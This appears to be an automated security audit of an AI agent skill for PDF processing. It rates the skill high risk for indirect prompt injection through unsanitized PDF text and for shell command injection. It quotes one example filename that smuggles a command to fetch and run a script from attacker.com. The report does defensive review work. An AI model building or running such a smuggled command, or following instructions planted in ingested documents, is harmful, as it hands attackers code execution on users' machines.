Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHPROMPT_INJECTIONCOMMAND_EXECUTION
Full Analysis
- PROMPT_INJECTION (HIGH): The skill is highly vulnerable to Indirect Prompt Injection (Category 8).
- Ingestion points: PDF files are read using
pypdf,pdfplumber, andpytesseract(SKILL.md). - Boundary markers: Absent. There are no instructions or delimiters to isolate the content of the PDF from the agent's instruction set.
- Capability inventory: The skill allows for local file writing, command-line execution (
qpdf,pdftk), and text extraction that feeds directly into the agent's reasoning loop. - Sanitization: Absent. There is no logic provided to filter or escape instructions that may be found within the PDF text or metadata.
- COMMAND_EXECUTION (HIGH): The skill documentation provides examples of shell command execution for PDF manipulation.
- Evidence: Use of
pdftotext,qpdf,pdftk, andpdfimagesvia shell commands (SKILL.md). - Risk: If the agent dynamically constructs these commands using filenames or metadata extracted from untrusted PDFs without strict sanitization, an attacker could achieve arbitrary command execution via shell metacharacters (e.g.,
input_file.pdf; curl attacker.com | bash). - EXTERNAL_DOWNLOADS (LOW): The skill references several external Python dependencies.
- Evidence: References to
pypdf,pdfplumber,pandas,reportlab,pytesseract, andpdf2image. - Status: These are well-known, legitimate packages, making the risk low, but their presence defines the attack surface for the Indirect Prompt Injection findings above.
Recommendations
- AI detected serious security threats
Audit Metadata